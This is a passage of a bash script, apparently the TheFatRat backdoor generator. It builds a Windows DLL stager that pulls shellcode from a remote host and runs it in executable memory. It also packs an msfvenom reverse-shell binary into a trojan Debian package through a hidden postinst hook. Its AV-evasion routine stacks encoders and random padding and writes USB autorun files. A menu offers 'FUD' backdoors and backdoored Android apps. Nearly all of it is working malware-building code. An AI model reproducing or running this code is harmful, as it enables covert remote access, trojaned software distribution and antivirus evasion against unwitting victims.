punt(my_socket, ".");'>> $dllcustom - echo ' target = gethostbyname(targetip);'>> $dllcustom - echo ' if (target == NULL)'>> $dllcustom - echo ' punt(my_socket, "..");'>> $dllcustom - echo ' memcpy(&sock.sin_addr.s_addr, target->h_addr, target->h_length);'>> $dllcustom - echo ' sock.sin_family = AF_INET;'>> $dllcustom - echo ' sock.sin_port = htons(port);'>> $dllcustom - echo ' if ( connect(my_socket, (struct sockaddr *)&sock, sizeof(sock)) )'>> $dllcustom - echo ' punt(my_socket, "...");'>> $dllcustom - echo ' return my_socket;'>> $dllcustom - echo '}' >> $dllcustom - echo 'int main(int argc, char * argv[]) {' >> $dllcustom - echo ' FreeConsole();'>> $dllcustom - echo ' ULONG32 size;'>> $dllcustom - echo ' char * buffer;'>> $dllcustom - echo ' void (*function)();'>> $dllcustom - echo ' winsock_init();'>> $dllcustom - echo ' SOCKET my_socket = wsconnect(server, atoi(serverp));'>> $dllcustom - echo ' int count = recv(my_socket, (char *)&size, 4, 0);'>> $dllcustom - echo ' if (count != 4 || size <= 0)'>> $dllcustom - echo ' punt(my_socket, "error lenght\n");'>> $dllcustom - echo ' buffer = VirtualAlloc(0, size + 5, MEM_COMMIT, PAGE_EXECUTE_READWRITE);'>> $dllcustom - echo ' if (buffer == NULL)'>> $dllcustom - echo ' punt(my_socket, "error in buf\n");'>> $dllcustom - echo ' buffer[0] = 0xBF;'>> $dllcustom - echo ' memcpy(buffer + 1, &my_socket, 4);'>> $dllcustom - echo ' count = recv_all(my_socket, buffer + 5, size);'>> $dllcustom - echo ' function = (void (*)())buffer;'>> $dllcustom - echo ' function();'>> $dllcustom - echo ' return 0;'>> $dllcustom - echo '}' >> $dllcustom - $COMPILER $dllcustom -o $output/$fira.dll -lws2_32 -shared - echo - strip $output/$fira.dll - rm $dllcustom - echo -e $yellow " [+]"$okegreen" Compiling C to dll done , chek in output folder ";tput sgr0 - if [[ -f "$output/$fira.dll" ]] - then - echo -e "$okegreen""Backdoor Saved To : $output/$fira.dll" - else - echo -e "$red""There was an error creating the backdoor" - fi - echo "" - echo -ne "$yellow"" Press [ENTER] to continue ......... " - read continue - PwnWinds - -;; -9) - clear - menu - -;; -*) - PwnWinds -;; -esac -} - - -function trodebi () { -#code write by screetsec -clear -echo -e $okegreen"" -echo "___________ ________ ___. .__ "; -echo "\__ ___/______ ____\______ \ ____\_ |__ |__|"; -echo " | | \_ __ \/ _ \| | \_/ __ \| __ \| |"; -echo " | | | | \( <_> ) \ \ ___/| \_\\ |"; -echo " |____| |__| \____/_______ /\___ >___ /__|"; -echo -e " \/ \/ \/ \n"; -echo -e "\tTroDebi - Trojan Debian Package For Remote Acces "; -echo -e "\tVersion - 1.0 " -echo -e "\tWrite by - screetsec \n\n " -echo -e " [desc] - Embed a Trojan Into Deb PKG + Run Post Install " - echo -e $okegreen"" - echo -e $yellow " Your local IPV4 address is : ${lanip}" - echo -e $yellow " Your local IPV6 address is : ${lanip6}" - echo -e $yellow " Your public IP address is : ${publicip}" - echo -e $yellow " Your Hostname is : ${hostn}" - if [ ! -f "$defcon" ] - then - yourip="" - yourport="" - fi - echo -e $okegreen"" - if [ -z "$yourip" ]; then - read -p ' Set LHOST IP: ' yourip - fi - echo -e $okegreen "" - if [ -z "$yourport" ]; then - read -p ' Set LPORT: ' yourport - fi - echo "" - echo -ne $okegreen " Enter the base name for Backdoor (ipscan_3.5.1_i386) : " ;tput sgr0 - read fira - invalid - if [ $err == "1" ] - then - echo -n "Press [ENTER] key to return to menu ." - read inp - bae - fi - seldeb - cp $exef tools/trodebi_temp/original/ - pldlnx - spinlong - #name=`ls | awk '{print $1}' | head -n 1 ` - echo - echo - gboor - spinlong - echo -e $yellow "" - echo ;echo - #$msfvenom -p $payload LHOST=$yourip LPORT=$yourport -b "\x00" -f elf > tmp_metasp/$fira - dpkg -x tools/trodebi_temp/original/*.deb tools/trodebi_temp/work/ - mkdir -p tools/trodebi_temp/work/usr;mkdir -p tools/trodebi_temp/work/usr/lib;mkdir -p tools/trodebi_temp/work/usr/lib/libssll;mkdir -p mkdir -p tools/trodebi_temp/work/usr/local; mkdir -p tools/trodebi_temp/work/usr/local/lib - msfvenom -p $payload LHOST=$yourip LPORT=$yourport -b "\x00" -f elf -o tools/trodebi_temp/evil/libssl1 - mv tools/trodebi_temp/evil/libssl1 tools/trodebi_temp/work/usr/lib/libssll/bash - mkdir -p tools/trodebi_temp/work/DEBIAN - cp tools/trodebi_temp/control/control tools/trodebi_temp/work/DEBIAN/control - echo "#!/bin/sh" > tools/trodebi_temp/work/DEBIAN/postinst - echo "" >> tools/trodebi_temp/work/DEBIAN/postinst - echo "" >> tools/trodebi_temp/work/DEBIAN/postinst - echo " sudo chmod 2755 /usr/lib/libssll/bash && /usr/lib/libssll/bash & " >> tools/trodebi_temp/work/DEBIAN/postinst - chmod 755 tools/trodebi_temp/work/DEBIAN/postinst - dpkg-deb --build tools/trodebi_temp/work - mv tools/trodebi_temp/work.deb $output/$fira.deb - rm -rf tools/trodebi_temp/work/* >> /dev/null 2>&1 - rm -rf tools/trodebi_temp/evil/* >> /dev/null 2>&1 - rm -rf tools/trodebi_temp/original/* >> /dev/null 2>&1 - spinlong - echo;echo - echo -e $yellow " [+]"$okegreen" Compiling Embed into Debian Package ";tput sgr0 - echo - echo -ne $yellow " Press Enter key to Contiune ..." - read aw - clear - menu -} - -########################################### MENU AVOID ############################################################ -# -#recoded AVOID ( AV0id - Metapsloit Payload Anti-Virus Evasion ) to next version - Screetsec ( Edo -maland ) -#Released as open source by NCC Group Plc - http://www.nccgroup.com/ -#Developed or original code by Daniel Compton, daniel dot compton at nccgroup dot com -#Removed Deprecated Commands in favor of MsfVenom by Jason Soto www.jsitech.com -#Credit to other A.V. scripts and research by Astr0baby, Vanish3r & Hasan aka inf0g33k , Screetsec -# -################################################################################################################ -function avoid { -clear - -# User options -PAYLOAD="windows/meterpreter/reverse_tcp" # The payload to use -MSFVENOM="$msfvenom" # Path to the msfvenom script -MSFCONSOLE="$msfconsole" # Path to the msfconsole script - -#Checking -[[ `id -u` -eq 0 ]] || { echo -e "\e[31mMust be root to run script"; exit 1; } -resize -s 36 73 > /dev/null -clear -SERVICE=service; - -#Checking Version -VERSION="2.1" - - -# spinner for Metasploit Generator -spinlong () -{ - bar=" +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ " - barlength=${#bar} - i=0 - while ((i < 100)); do - n=$((i*barlength / 100)) - printf "\e[00;32m\r[%-${barlength}s]\e[00m" "${bar:0:n}" - ((i += RANDOM%5+2)) - sleep 0.02 - done -} - - -# spinner for random seed generator -spinlong2 () -{ - bar=" 01100111001001001110111001101010101010110101001010111001010101010101010" - barlength=${#bar} - i=0 - while ((i < 100)); do - n=$((i*barlength / 100)) - printf "\e[00;32m\r[%-${barlength}s]\e[00m" "${bar:0:n}" - ((i += RANDOM%5+2)) - sleep 0.02 - done -} -clear - -#MENU INTI -echo "" -echo -e $cyan"========================================================================" -echo -e $okegreen" METASPLOIT SHELL A.V. FOR BYPASS AV THIS VERSION $VERSION " -echo -e $cyan"========================================================================" -echo -e $red"" -echo " " -echo " ..:::::::::.. " -echo " ..:::aad8888888baa:::.. " -echo " .::::d:?88888888888?::8b::::. " -echo " .:::d8888:?88888888??a888888b:::. " -echo " .:::d8888888a8888888aa8888888888b:::. " -echo " ::::dP::::::::88888888888::::::::Yb:::: " -echo " ::::dP:::::::::Y888888888P:::::::::Yb:::: " -echo " ::::d8:::::::::::Y8888888P:::::::::::8b:::: " -echo " .::::88::::::::::::Y88888P::::::::::::88::::. " -echo " :::::Y8baaaaaaaaaa88P:T:Y88aaaaaaaaaad8P::::: " -echo " :::::::Y88888888888P::|::Y88888888888P::::::: " -echo " ::::::::::::::::888:::|:::888:::::::::::::::: " -echo " :::::::::::::::8888888888888b:::::::::::::: " -echo " :::::::::::::::88888888888888:::::::::::::: " -echo " :::::::::::::d88888888888888::::::::::::: " -echo " ::::::::::::88::88::88:::88:::::::::::: " -echo " ::::::::::88::88::88:::88:::::::::: " -echo " ::::::::88::88::P::::88:::::::: " -echo " ::::::88::88:::::::88:::::: " -echo " ::::::::::::::::::: " -echo " ::::::::: " -echo "" -echo -e -$cyan " REMAKE:$red "Screetsec" $cyan( Edo -maland- ) " -echo -e " OPEN SOURCE : $red "NCC Group Plc" $cyan( http://www.nccgroup.com ) " -echo -e " DEVELOPED : $red Daniel Compton, daniel dot compton at nccgroup dot com " -echo -e $cyan"========================================================================" -echo -e $okegreen" METASPLOIT SHELL A.V. FOR BYPASS AV THIS VERSION $VERSION " -echo -e $cyan"========================================================================" -echo -e $cyan"" -# Set Output filename -echo -echo -n -e "TYPE THE DESIRED OUTPUT FILENAME (APP.exe) : $okegreen" ; -read OUTPUTNAME -echo "" -echo "" -echo -n -e $cyan"TYPE THE DESIRED LABEL FOR THE AUTORUN FILES : $okegreen" ; -read LABEL -echo "" - -#Check for Metasploit -if [[ "$msfvenom" != "" || "$msfconsole" != "" ]]; then - echo "" -else - echo "" - echo -e "\e[01;31m[!]\e[00m Unable to find the required Metasploit program, cant continue. Install and try again" - echo -e "\e[01;31m[!]\e[00m If msfpayload, msfencode and msfcli are not in your PATH, edit this script options" - echo "" - exit 1 -fi - -# Random Msfencode encoding iterations -#ITER=`seq 5 10 |sort -R |sort -R | head -1` -ITER=`shuf -i 10-20 -n 1` -echo -e $okegreen"" -echo -e $yellow "Your local IPV4 address is : $lanip" -echo -e $yellow "Your local IPV6 address is : $lanip6" -echo -e $yellow "Your public IP address is : $publicip" -echo -e $yellow "Your Hostname is : $hostn" -if [ ! -f "$defcon" ] -then -yourip="" -yourport="" -fi -echo -e $okegreen"" -if [ -z "$yourip" ]; then -read -p ' Set LHOST IP: ' yourip -fi -echo -e $okegreen "" -if [ -z "$yourport" ]; then -read -p ' Set LPORT: ' yourport -fi -invalid1 -if [ $err == "1" ] -then -echo -e $okegreen "" -echo -n "Press [ENTER] key to return to menu ." -read inp -avoid -fi - echo "" - echo "" -echo "" -echo -e "\e[01;32m[-]\e[00m Generating Metasploit payload, please wait..." -echo "" -spinlong -echo "" -#Payload creater -$MSFVENOM -p "$PAYLOAD" LHOST="$yourip" LPORT="$yourport" EXITFUNC=thread -f raw | $MSFVENOM -e x86/shikata_ga_nai -i $ITER -f raw 2>/dev/null | $MSFVENOM -e x86/jmp_call_additive -i $ITER -a x86 --platform linux -f raw 2>/dev/null | $MSFVENOM -e x86/call4_dword_xor -i $ITER -a x86 --platform win -f raw 2>/dev/null | $MSFVENOM -e x86/shikata_ga_nai -i $ITER -a x86 --platform win -f c > $path/temp/msf.c 2>/dev/null -echo "" -echo "" - - -# ANOTHER MENU -clear -echo " " -echo -e $cyan"==================================================================" -echo -e $okegreen" __ _ _ __ " -echo " / _|_ _ ___| | ___ _ ___ _ _ _ __ ___ ___| |/ _| " -echo " | |_| | | |/ __| |/ / | | |/ _ \| | | | '__/ __|/ _ \ | |_ " -echo " | _| |_| | (__| <| |_| | (_) | |_| | | \__ \ __/ | _| " -echo " |_| \____|\___|_|\_\\___ |\___/ \____|_| |___/\___|_|_| " -echo " |___/ " -echo -e $cyan"==================================================================" -echo -e $red"" -echo -e $okegreen" |||||||||||||| " -echo -e $red" = \ " -echo " = | " -echo " _= ___/ " -echo -e " / _\ ($okegreen"o"$red)\ " -echo " | | \ _ \ " -echo " | |/ (____) " -echo " \__/ / | " -echo " / / ___) " -echo -e " / \ \ _) $okegreen ) " -echo -e $red" \ \ / $okegreen TheFatRat $okegreen ( " -echo -e $red" \/ \ \_________/ |\___________________ $okegreen ) " -echo -e $red" \/ \ / | $okegreen"===="$red _______)__) " -echo -e " \/ \ / __/___ $okegreen"===="$red _/ " -echo -e " \/ \ / ($okegreen"O"$red ____)\\_(_/ " -echo -e " ($okegreen"O"$red _ ____) " -echo -e " ($okegreen"O"$red ____) " -echo "" -echo -e $cyan"================================================================= " -echo "" -echo -e $okegreen"" -echo " 1. Normal [ 400K payload ] - [ fast compile ] " -echo "" -echo " 2. Stealth [ 1-2 MB payload ] - [ fast compile ] " -echo "" -echo " 3. Super Stealth - [ 10-20MB payload ] " -echo "" -echo " 4. Insane Stealth - [ 50MB payload ] " -echo "" -echo " 5. Desperate Stealth - [ 100MB payload ] " -echo "" -echo -ne $cyan "TYPE THE NUMBER IF YOU WANT : " ; -read LEVEL -echo "" -if [ "$LEVEL" = "1" ]; then - echo "" - echo -e "\e[01;32m[-]\e[00m Normal selected, please wait a few seconds" - echo "" - echo -e "\e[01;32m[-]\e[00m Generating random seed for padding...please wait" - echo "" - spinlong2 - SEED=$(shuf -i 100000-500000 -n 1) -elif [ "$LEVEL" = "2" ]; then - echo "" - echo -e "\e[01;32m[-]\e[00m Stealth selected, please wait a few seconds" - echo "" - echo -e "\e[01;32m[-]\e[00m Generating random seed for padding...please wait" - echo "" - spinlong2 - SEED=$(shuf -i 1000000-5000000 -n 1) -elif [ "$LEVEL" = "3" ]; then - echo "" - echo -e "\e[01;32m[-]\e[00m Super Stealth selected, please wait a few seconds" - echo "" - echo -e "\e[01;32m[-]\e[00m Generating random seed for padding...please wait" - echo "" - spinlong2 - SEED=$(shuf -i 8000000-12000000 -n 1) -elif [ "$LEVEL" = "4" ]; then - echo "" - echo -e "\e[01;32m[-]\e[00m Insane Stealth selected, please wait a few minutes" - echo "" - echo -e "\e[01;32m[-]\e[00m Generating random seed for padding...please wait" - echo "" - spinlong2 - SEED=$(shuf -i 40000000-60000000 -n 1) -elif [ "$LEVEL" = "5" ]; then - echo "" - echo -e "\e[01;32m[-]\e[00m Desperate Stealth selected, please wait a few minutes" - echo "" - echo -e "\e[01;32m[-]\e[00m Generating random seed for padding...please wait" - echo "" - spinlong2 - SEED=$(shuf -i 100000000-200000000 -n 1) -else - echo -e "\e[01;31m[!]\e[00m You didnt select a option, exiting" - echo "" - exit 1 -fi - -# build the c file ready for compile -echo "" -echo '#include ' >> $path/temp/build.c -echo 'unsigned char padding[]=' >> $path/temp/build.c -cat /dev/urandom | tr -dc _A-Z-a-z-0-9 | head -c$SEED > $path/temp/random -sed -i 's/$/"/' $path/temp/random -sed -i 's/^/"/' $path/temp/random -cat $path/temp/random >> $path/temp/build.c -echo ';' >> $path/temp/build.c -echo 'char payload[] =' >> $path/temp/build.c -cat $path/temp/msf.c |grep -v "unsigned" >> $path/temp/build.c -echo 'char comment[512] = "";' >> $path/temp/build.c -echo 'int main(int argc, char **argv) {' >> $path/temp/build.c -echo ' (*(void (*)()) payload)();' >> $path/temp/build.c -echo ' return(0);' >> $path/temp/build.c -echo '}' >> $path/temp/build.c - -# gcc compile the exploit - -ls icons/icon.res >/dev/null 2>&1 -if [ $? -eq 0 ]; then - $COMPILER -Wall -mwindows $path/temp/build.c -o "$OUTPUTNAME" -else - $COMPILER -Wall -mwindows $path/temp/build.c -o "$OUTPUTNAME" -fi - -# check if file built correctly -LOCATED=`pwd` -ls "$OUTPUTNAME" >/dev/null 2>&1 -if [ $? -eq 0 ]; then - echo "" - echo -e "\e[01;32m[+]\e[00m Your payload has been successfully created and is located here: \e[01;32m"$LOCATED"/"$OUTPUTNAME"\e[00m" -else - echo "" - echo -e "\e[01;31m[!]\e[00m Something went wrong trying to compile the executable, exiting" - echo "" - exit 1 -fi - -# create autorun files -mkdir autorun >/dev/null 2>&1 -cp "$OUTPUTNAME" autorun/ >/dev/null 2>&1 -cp icons/autorun.ico autorun/ >/dev/null 2>&1 -echo "[autorun]" > autorun/autorun.inf -echo "open="$OUTPUTNAME"" >> autorun/autorun.inf -echo "icon=autorun.ico" >> autorun/autorun.inf -echo "label="$LABEL"" >> autorun/autorun.inf -echo "" -echo -e "\e[01;32m[+]\e[00m I have also created 3 AutoRun files here: \e[01;32m"$LOCATED"/"autorun/"\e[00m - simply copy these files to a CD or USB" - -# clean up temp files -rm -f $path/temp/* >/dev/null 2>&1 -echo "" -echo -n -e $okegreen"Press [ENTER] key to return to menu" - read back -clear - menu -} - - -#### credits -function credits { -clear -echo -e " -\033[31m##########################################################################\033[m - Credits To -\033[31m##########################################################################\033[m" -echo -echo -e $white "Special thanks to:" -echo -echo -e $red "Dracos Linux ( www.dracos-linux.org )" -echo -echo -e $red "Offensive Security for the awesome OS" -echo -echo -e $green "http://www.offensive-security.com/" -echo -echo -e $yellow "http://www.kali.org/" -echo -echo -e $cyan "http://www.kitploit.com/" -echo -echo -e $white "http://www.linuxsec.org/" -echo -echo -e $red "Dana James Traversie - (backdoor-apk)" -echo -echo -e $cyan "z0noxz - (powerstager)" -echo -echo -e $white "peterpt" -echo -echo -e $red "Big Thanks to : http://www.github.com/" -echo -echo "" -echo -n -e $okegreen "Press [ENTER] key to return to menu" - read back -clear - menu - -} - -################################################################### -# MENU FATRAT -################################################################### -menu () { - clear - clear - resize -s 46 76 > /dev/null - echo -e $okegreen"" - echo -e $okegreen" ____ " - echo -e $okegreen" | | " - echo -e $okegreen" |____| " - echo -e $okegreen" _|____|_ $okegreen _____ _ _____ _ _____ _ " - echo -e $okegreen" / $white"ee"\_ $okegreen|_ _| |_ ___| __|___| |_| __ |___| |_ " - echo -e $okegreen" .< __O $okegreen | | | | -_| __| .'| _| -| .'| _| " - echo -e $okegreen" /\ \.-.' \ $okegreen |_| |_|_|___|__| |___|_| |__|__|___|_| " - echo -e $okegreen" J \.|'.\/ \ " - echo -e $okegreen" | |_.|. | | | $white"[$okegreen--$white] $cyan " $white"Backdoor" Creator for Remote Acces $white[$okegreen--$white] " - echo -e $okegreen" \__.' .|-' / $white"[$okegreen--$white] $cyan" Created by: "$red"Edo Maland (Screetsec) $white[$okegreen--$white] " - echo -e $okegreen" L /|o'--'\ $white"[$okegreen--$white] $cyan" Version: $red"$Versi" $white[$okegreen--$white] " - echo -e $okegreen" | /\/\/\ \ $white"[$okegreen--$white] $cyan" Codename: $red"$codename" $white[$okegreen--$white] " - echo -e $okegreen" J / \.__\ $white"[$okegreen--$white] $cyan" Follow me on Github: $red@Screetsec $white[$okegreen--$white] " - echo -e $okegreen" J / \.__\ $white"[$okegreen--$white] $cyan" Dracos Linux : $red@dracos-linux.org $white[$okegreen--$white] " - echo -e $okegreen" |/ / $white"[$okegreen--$white] $cyan" $white[$okegreen--$white] " - echo -e $okegreen" \ .'\. $white"[$okegreen--$white]$white " SELECT AN OPTION TO BEGIN: $white[$okegreen--$white] " - echo -e $okegreen" ____)_/\_(___\. $white"[$okegreen--$white] ".___________________________________$white[$okegreen--$white] " - echo -e $okegreen" (___._/ \_.___)'$white\_.-----------------------------------------/ " - echo - - - echo -e $white " " - echo -e $white" [$okegreen"01"$white]$okegreen Create Backdoor with msfvenom" - echo -e $white" [$okegreen"02"$white]$okegreen Create Fud 100% Backdoor with Fudwin 1.0" - echo -e $white" [$okegreen"03"$white]$okegreen Create Fud Backdoor with Avoid v1.2 " - echo -e $white" [$okegreen"04"$white]$okegreen Create Fud Backdoor with backdoor-factory [embed] " - echo -e $white" [$okegreen"05"$white]$okegreen Backdooring Original apk [Instagram, Line,etc] " - echo -e $white" [$okegreen"06"$white]$okegreen Create Fud Backdoor 1000% with PwnWinds [Excelent] " - echo -e $white" [$okegreen"07"$white]$okegreen Create Backdoor For Office with Microsploit " - echo -e $white" [$okegreen"08"$white]$okegreen Trojan Debian Package For Remote Acces [Trodebi] " - echo -e $white" [$okegreen"09"$white]$okegreen Load/Create auto listeners " - echo -e $white" [$okegreen"10"$white]$okegreen Jump to msfconsole " - echo -e $white" [$okegreen"11"$white]$okegreen Searchsploit " - echo -e $white" [$okegreen"12"$white]$okegreen File Pumper [Increase Your Files Size] " - echo -e $white" [$okegreen"13"$white]$okegreen Configure Default Lhost & Lport " - echo -e $white" [$okegreen"14"$white]$okegreen Cleanup " - echo -e $white" [$okegreen"15"$white]$okegreen Help " - echo -e $white" [$okegreen"16"$white]$okegreen Credits " - echo -e $white" [$okegreen"17"$white]$okegreen Exit " - echo -e " " - echo -e $okegreen" ┌─["$red"TheFatRat$okegreen]──[$red~$okegreen]─["$yellow"menu$okegreen]:" - echo -ne $okegreen" └─────► " ;tput sgr0 - read fatrat - - if test $fatrat == '1' - then - cmsfvenom - - elif test $fatrat == '2' - then - fudwin - - elif test $fatrat == '3' - then - avoid - - elif test $fatrat == '4' - then - echo "" - spinlong - echo -e "\n" - echo -e $okegreen"" - echo -e $yellow " Your local IPV4 address is : $lanip" - echo -e $yellow " Your local IPV6 address is : $lanip6" - echo -e $yellow " Your public IP address is : $publicip" - echo -e $yellow " Your Hostname is : $hostn" - echo -e $okegreen"" - if [ ! -f "$defcon" ] - then - yourip="" - yourport="" - fi - if [ -z "$yourip" ]; then - read -p ' Set LHOST IP: ' yourip - fi - echo -e $okegreen "" - if [ -z "$yourport" ]; then - read -p ' Set LPORT: ' yourport - fi - read -p ' Please enter the base name for output files : ' fira - invalid - if [ $err == "1" ] - then - echo -e $okegreen "" - echo -n "Press [ENTER] key to return to menu ." - read inp - menu - fi - selexe - pldbkf - echo "" - gboor - spinlong2 - echo "" - echo -e $okegreen"" - $backdoor -f $exef -s $payload -H $yourip -P $yourport -o $output/$fira.exe - backout="$output/$fira.exe" - if [ ! -f "$backout" ] - then - echo -e $red "There was a problem in the creation of your backdoor file using backdoor-factory" - echo -e $red "One of the problable causes is that the EXE file you selected is not yet supported" - echo "" - echo -e $okegreen "Press [ENTER] key to continue to main menu " - read mmenu - clear - menu - else - echo "" - echo -e $cyan "Your Rat was saved To :" - echo -e $cyan "$output/$fira.exe" - echo "" - bkflst - read bebeku - clear - menu - fi - elif test $fatrat == '5' - then - embedapk - - elif test $fatrat == '6' - then - PwnWinds - - elif test $fatrat == '7' - then - microsploit - - elif test $fatrat == '8' - then - trodebi - - elif test $fatrat == '9' - then - clisteners - - elif test $fatrat == '10' - then - xterm -fa monaco -fs 13 -bg black -e "$msfconsole" - clear - menu - - elif test $fatrat == '11' - then - echo - echo -ne $okegreen " What do you want to Hack Today ? :" ;tput sgr0 - read searchterm - echo - gnome-terminal --maximize -t "Seachsploit" --working-directory=WORK_DIR -x bash -c "$searchsploit $searchterm; echo -e '\e[32m[-] Close this window when done!\e[0m'; bash" 2>/dev/null & sleep 2 - menu - - elif test $fatrat == '12' - then - echo - echo -ne $okegreen " Located file (example:/output/backdoor.exe) :" ;tput sgr0 - read tampfile - echo - echo -ne $okegreen" Size file for tamper (1000 for kb) (1 for mb ) : " ;tput sgr0 - read size - echo - echo -ne $okegreen" mb or kb : " ;tput sgr0 - read type - python $pump $tampfile $size -$type > /dev/null 2>&1 - echo - echo -ne $yellow" Finished Pumping ... " - read oke - menu - - elif test $fatrat == '13' - then - echo "" - confdefault - clear - menu - - elif test $fatrat == '14' - then - echo "" - echo -ne $red" [>] $cyan Are you sure you want to clean payload folders? [y/N] : " - read clean - if [ $clean == "n" ] ; - then - clear - menu - else - echo -ne $red"\n [*] $cyan Cleaning $path/temp/ \n" - rm $path/temp/* >/dev/null 2>&1 - sleep 2 - echo "" - echo -e $red" [*] $cyan Cleaning $path/autorun/ " - rm $path/autorun/* >/dev/null 2>&1 - sleep 2 - echo "" - echo -e $red" [*] $cyan Cleaning $output/ " - rm $output/* >/dev/null 2>&1 - sleep 2 - echo "" - echo -e $red" [*] $cyan Cleaning $path/config/listeners/ " - rm $path/config/listeners/* >/dev/null 2>&1 - sleep 2 - echo "" - echo -e $red" [*] $cyan Cleaning $path/*.exe or apk" - rm *.exe *.apk >/dev/null 2>&1 - sleep 2 - echo "" - echo -ne $red" [*] $cyan Folders cleaned, press [ENTER] key to return to the main menu." - read anjeng - menu - fi - - elif test $fatrat == '15' - then - firefox https://github.com/Screetsec/TheFatRat/blob/master/README.md - clear - menu - - elif test $fatrat == '16' - then - credits - - elif test $fatrat == '17' - then - Stop - echo "" - echo -e $okegreen" REMEMBER , DONT UPLOAD TO VIRUSTOTAL !!" - echo "" - read -p " Press [Enter] key to Exit..." - sleep 2 - clear - exit - else - clear - menu - - fi - -} -################################################################### -# MENU FATRAT -################################################################### -clear -clear -resize -s 46 76 > /dev/null -echo -e $okegreen"" -echo -e $okegreen" ____ " -echo -e $okegreen" | | " -echo -e $okegreen" |____| " -echo -e $okegreen" _|____|_ $okegreen _____ _ _____ _ _____ _ " -echo -e $okegreen" / $white"ee"\_ $okegreen|_ _| |_ ___| __|___| |_| __ |___| |_ " -echo -e $okegreen" .< __O $okegreen | | | | -_| __| .'| _| -| .'| _| " -echo -e $okegreen" /\ \.-.' \ $okegreen |_| |_|_|___|__| |___|_| |__|__|___|_| " -echo -e $okegreen" J \.|'.\/ \ " -echo -e $okegreen" | |_.|. | | | $white"[$okegreen--$white] $cyan " $white"Backdoor" Creator for Remote Acces $white[$okegreen--$white] " -echo -e $okegreen" \__.' .|-' / $white"[$okegreen--$white] $cyan" Created by: "$red"Edo Maland (Screetsec) $white[$okegreen--$white] " -echo -e $okegreen" L /|o'--'\ $white"[$okegreen--$white] $cyan" Version: $red"$Versi" $white[$okegreen--$white] " -echo -e $okegreen" | /\/\/\ \ $white"[$okegreen--$white] $cyan" Codename: $red"$codename" $white[$okegreen--$white] " -echo -e $okegreen" J / \.__\ $white"[$okegreen--$white] $cyan" Follow me on Github: $red@Screetsec $white[$okegreen--$white] " -echo -e $okegreen" J / \.__\ $white"[$okegreen--$white] $cyan" Dracos Linux : $red@dracos-linux.org $white[$okegreen--$white] " -echo -e $okegreen" |/ / $white"[$okegreen--$white] $cyan" $white[$okegreen--$white] " -echo -e $okegreen" \ .'\. $white"[$okegreen--$white]$white " SELECT AN OPTION TO BEGIN: $white[$okegreen--$white] " -echo -e $okegreen" ____)_/\_(___\. $white"[$okegreen--$white] ".___________________________________$white[$okegreen--$white] " -echo -e $okegreen" (___._/ \_.___)'$white\_.-----------------------------------------/ " -echo - - - echo -e $white " " - echo -e $white" [$okegreen"01"$white]$okegreen Create Backdoor with msfvenom" - echo -e $white" [$okegreen"02"$white]$okegreen Create Fud 100% Backdoor with Fudwin 1.0" - echo -e $white" [$okegreen"03"$white]$okegreen Create Fud Backdoor with Avoid v1.2 " - echo -e $white" [$okegreen"04"$white]$okegreen Create Fud Backdoor with backdoor-factory [embed] " - echo -e $white" [$okegreen"05"$white]$okegreen Backdooring Original apk [Instagram, Line,etc] " - echo -e $white" [$okegreen"06"$white]$okegreen Create Fud Backdoor 1000% with PwnWinds [Excelent] " - echo -e $white" [$okegreen"07"$white]$okegreen Create Backdoor For Office with Microsploit " - echo -e $white" [$okegreen"08"$white]$okegreen Trojan Debian Package For Remote Acces [Trodebi] " - echo -e $white" [$okegreen"09"$white]$okegreen Load/Create auto listeners " - echo -e $white" [$okegreen"10"$white]$okegreen Jump to msfconsole " - echo -e $white" [$okegreen"11"$white]$okegreen Searchsploit " - echo -e $white" [$okegreen"12"$white]$okegreen File Pumper [Increase Your Files Size] " - echo -e $white" [$okegreen"13"$white]$okegreen Configure Default Lhost & Lport " - echo -e $white" [$okegreen"14"$white]$okegreen Cleanup " - echo -e $white" [$okegreen"15"$white]$okegreen Help " - echo -e $white" [$okegreen"16"$white]$okegreen Credits " - echo -e $white" [$okegreen"17"$white]$okegreen Exit " - echo -e " " - echo -e $okegreen" ┌─["$red"TheFatRat$okegreen]──[$red~$okegreen]─["$yellow"menu$okegreen]:" - echo -ne $okegreen" └─────► " ;tput sgr0 - read fatrat - - if test $fatrat == '1' - then - cmsfvenom - - elif test $fatrat == '2' - then - fudwin - - elif test $fatrat == '3' - then - avoid - - elif test $fatrat == '4' - then - echo "" - spinlong - echo -e "\n" - echo -e $okegreen"" - echo -e $yellow " Your local IPV4 address is : $lanip" - echo -e $yellow " Your local IPV6 address is : $lanip6" - echo -e $yellow " Your public IP address is : $publicip" - echo -e $yellow " Your Hostname is : $hostn" - echo -e $okegreen"" - if [ ! -f "$defcon" ] - then - yourip="" - yourport="" - fi - if [ -z "$yourip" ]; then - read -p ' Set LHOST IP: ' yourip - fi - echo -e $okegreen "" - if [ -z "$yourport" ]; then - read -p ' Set LPORT: ' yourport - fi - read -p ' Please enter the base name for output files : ' fira - invalid - if [ $err == "1" ] - then - echo -e $okegreen "" - echo -n "Press [ENTER] key to return to menu ." - read inp - menu - fi - selexe - pldbkf - echo "" - gboor - spinlong2 - echo "" - echo -e $okegreen"" - $backdoor -f $exef -s $payload -H $yourip -P $yourport -o $output/$fira.exe - backout="$output/$fira.exe" - if [ ! -f "$backout" ]; then - echo -e $red "There was a problem in the creation of your backdoor file using backdoor-factory" - echo -e $red "One of the problable causes is that the EXE file you selected is not yet supported" - echo "" - echo -e $okegreen "Press [ENTER] key to continue to main menu " - read mmenu - clear - menu - else - echo "" - echo -e $cyan "Your Rat was saved To :" - echo -e $cyan "$output/$fira.exe" - echo "" - bkflst - read bebeku - clear - menu - - fi - elif test $fatrat == '5' - then - embedapk - - elif test $fatrat == '6' - then - PwnWinds - - elif test $fatrat == '7' - then - microsploit - - elif test $fatrat == '8' - then - trodebi - - elif test $fatrat == '9' - then - clisteners - - elif test $fatrat == '10' - then - xterm -fa monaco -fs 13 -bg black -e "$msfconsole" - clear - menu - -elif test $fatrat == '11' - then - echo - echo -ne $okegreen " What do you want to Hack Today ? : " ;tput sgr0 - read searchterm - echo - gnome-terminal --maximize -t "Seachsploit" --working-directory=WORK_DIR -x bash -c "$searchsploit $searchterm; echo -e '\e[32m[-] Close this window when done!\e[0m'; bash" 2>/dev/null & sleep 2 - menu - - elif test $fatrat == '12' - then - echo - echo -ne $okegreen " Located file (example:/output/backdoor.exe) :" ;tput sgr0 - read tampfile - echo - echo -ne $okegreen" Size file for tamper (1000 for kb) (1 for mb ) : " ;tput sgr0 - read size - echo - echo -ne $okegreen" mb or kb : " ;tput sgr0 - read type - python $pump $tampfile $size -$type > /dev/null 